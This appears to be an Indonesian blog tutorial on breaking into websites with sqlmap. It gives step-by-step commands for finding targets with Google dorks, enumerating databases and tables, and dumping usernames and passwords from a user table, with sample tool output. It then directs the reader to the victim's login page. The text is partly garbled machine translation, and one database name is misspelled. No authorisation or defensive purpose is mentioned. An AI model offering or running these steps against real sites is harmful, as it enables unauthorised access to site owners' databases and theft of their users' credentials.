Lompat ke konten Lompat ke sidebar Lompat ke footer
Beranda / tutor

Cara Hack Website Dengan Sqlmap


Halo google ..... hari ini kita akan membahas wacana cara meretas situs web memakai sqlmap


Baiklah, mari kita mulai ...


pertama ... jikalau Anda memakai kali linux, sqlmap telah diinstal.


Sekarang buka terminal Anda


1. Anda harus menemukan sasaran Anda dengan memakai google dork.

2. Jika Anda mempunyai sasaran Anda sendiri tanpa memakai google dork Anda juga sanggup memindai kerentanan sasaran Anda dengan memakai uniscan atau w3af


3. Baiklah sehabis Anda mempunyai sasaran lalu buka sqlmap di terminal


4. ketik sqlmap -u http://www.target.com/phd?id=2 --dbs


5. jikalau Anda berhasil, Anda akan melihat ini
[INFO] retrieved: information_schema
[INFO] retrieved: sqldummywebsite



6. Kemudian ketik sqlmap -u http://www.target.com/phd?id=2 -D information_scheme --tables


7. Anda akan melihat ini
[10:56:22] [INFO] heuristics detected web page charset
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info



8. Allright type Kemudian ketik sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info --columns


9. Tampilannya menyerupai ini

[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)



10. then type sqlmap -u http://www.target.com/phd?id=2 -D information_scheme -T user_info -C user_id,user_login,user_password --dump


11. Taraaa Done ..... Selanjutnya pekerjaan Anda masih belum simpulan ,, Anda harus menemukan halaman login target.


12. Ok hingga jumpa di postingan selanjutnya

Sumber https://idahdeen.blogspot.com/

Anda mungkin menyukai postingan ini :